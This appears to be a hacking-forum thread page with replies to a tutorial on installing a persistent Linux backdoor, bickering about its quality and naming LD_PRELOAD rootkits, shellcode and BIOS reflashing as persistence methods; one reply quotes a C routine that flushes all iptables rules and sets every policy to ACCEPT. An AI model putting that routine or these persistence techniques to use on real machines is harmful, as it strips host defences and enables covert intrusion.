The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
|
Tutorial Installing a persistent backdoor on Linux
filter_list
|
|
|
Twelve Years of Service
Posts: 1,635
Threads: 147
RE: Installing a persistent backdoor on Linux 05-23-2015, 11:40 PM
#11
For what it's worth I did find this somewhat interesting to read. I don't think there's anything wrong with sharing the info.
Those who criticize I'd ask that you also contribute to some degree in how you would tackle the same scenario. Tutorials and case studies are always great to have
•
Eleven Years of Service
Posts: 82
Threads: 8
RE: Installing a persistent backdoor on Linux 05-23-2015, 11:44 PM
#12
(05-23-2015, 11:21 PM)Dyme Wrote: Lmao gtfo of here with this shit, $100 bucks you use a ld_preload kit.
Glad I can deny this. I don't kit unless it's the target is of value. All I use mostly is a polymorphic /bin/sh shellcode. Otherwise I use flashrom to patch the bios with another compatible firmware bundled with my kit. However I'll bet $100 you use an ld_preload, hmm say umbreon? Lol rippr
•
Thirteen Years of Service
Posts: 954
Threads: 26
RE: Installing a persistent backdoor on Linux 05-23-2015, 11:47 PM
#13
(05-23-2015, 11:44 PM)warstrike Wrote: Glad I can deny this. I don't kit unless it's the target is of value. All I use mostly is a polymorphic /bin/sh shellcode. Otherwise I use flashrom to patch the bios with another compatible firmware bundled with my kit. However I'll bet $100 you use an ld_preload, hmm say umbreon? Lol rippr
>mentions 'polymorphic shellcode'
oh I'm sorry I didn't realize I was talking to a
real hacker here.
The following 1 user Likes Dyme's post:1 user Likes Dyme's post
• Kizaru
Eleven Years of Service
Posts: 82
Threads: 8
RE: Installing a persistent backdoor on Linux 05-23-2015, 11:50 PM
#14
(05-23-2015, 11:47 PM)Dyme Wrote: >mentions 'polymorphic shellcode'
oh I'm sorry I didn't realize I was talking to a real hacker here.
I'm not
•
Eleven Years of Service
Posts: 127
Threads: 5
RE: Installing a persistent backdoor on Linux 05-24-2015, 08:53 AM
#15
(05-23-2015, 11:33 PM)Cyph3rX Wrote: This is just to teach people the basics of how to do something like this, this could be useful for people new to Linux who have no idea where to start.
If your target audience are beginners then don't teach them fucking bullshit. There are a hundred times better methods to backdoor a *nix box that are just as easy for a beginner to understand if you explain well enough.
Twelve Years of Service
Posts: 20
Threads: 1
RE: Installing a persistent backdoor on Linux 07-04-2015, 08:55 AM
#16
Code:
#ifdef IPTABLES
void flush_iptables(void)
{
system("iptables -X 2> /dev/null");
system("iptables -F 2> /dev/null");
system("iptables -t nat -F 2> /dev/null");
system("iptables -t nat -X 2> /dev/null");
system("iptables -t mangle -F 2> /dev/null");
system("iptables -t mangle -X 2> /dev/null");
system("iptables -P INPUT ACCEPT 2> /dev/null");
system("iptables -P FORWARD ACCEPT 2> /dev/null");
system("iptables -P OUTPUT ACCEPT 2> /dev/null");
}
#endif
The coder seems to be afflicted with autism.
•
Twelve Years of Service
Posts: 112
Threads: 10
RE: Installing a persistent backdoor on Linux 08-28-2015, 08:21 PM
#17
(06-08-2015, 04:13 PM)R3Tak3 Wrote: As a beginner I found this useful. Are there any threads with good examples of APT's?
If by APT you Advanced Persistent Threat...you're using it in the wrong context buddy.
Anyways, This thread could be helpful to some to be honest. The same goes with any information posted here. It all has value to some extent. Whatever you take from it is up to you.
•
Users browsing this thread: